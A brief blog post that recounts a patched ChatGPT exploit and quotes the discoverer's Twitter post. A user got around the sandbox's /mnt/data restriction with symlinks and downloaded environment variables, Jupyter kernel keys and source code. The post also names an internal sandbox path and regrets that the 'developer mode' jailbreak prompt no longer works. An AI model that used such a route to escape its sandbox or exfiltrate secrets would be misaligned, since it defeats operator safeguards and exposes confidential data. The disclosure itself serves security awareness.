There was an exploit in ChatGPT that allowed a user to create symlinks in the Linux filesystem that ChatGPT runs on and then download data in a zip file. This has been patched, but this is interesting, this allowed stealing data from the machine. This is a cautionary tale. This is why an LLM needs to be designed very carefully, you must filter all user input as it can not be trusted. ChatGPT uses Kubernetes to handle the container that the OpenAI system runs in and this is under the /home/sandbox/.openai_internal folder. I think it uses a Debian system as well. At least this was fixed very quickly, a user on Twitter reported this bug and this was fixed very quickly, this is still an interesting development though.
Here is the Twitter post.
That was fun. I bypassed a @OpenAI ChatGPT /mnt/data restriction via a symlink, downloaded envs, Jupyter kernels' keys, and some source code from there. Reported via @Bugcrowd and got not applicable! Now this issue is fixed (in like an hours after my report).. Is it how it… pic.twitter.com/TfMoUJYKUb
— Ivan at Wallarm / API security solution (@d0znpp) November 14, 2023
But this is against the terms and conditions to attempt to use the ChatGPT bot as a personal computer and generate files to download, this just implies that security is very important and user input can not be trusted at all. it must be sanitized to maintain security. it is just a pity the developer mode prompt does not work anymore.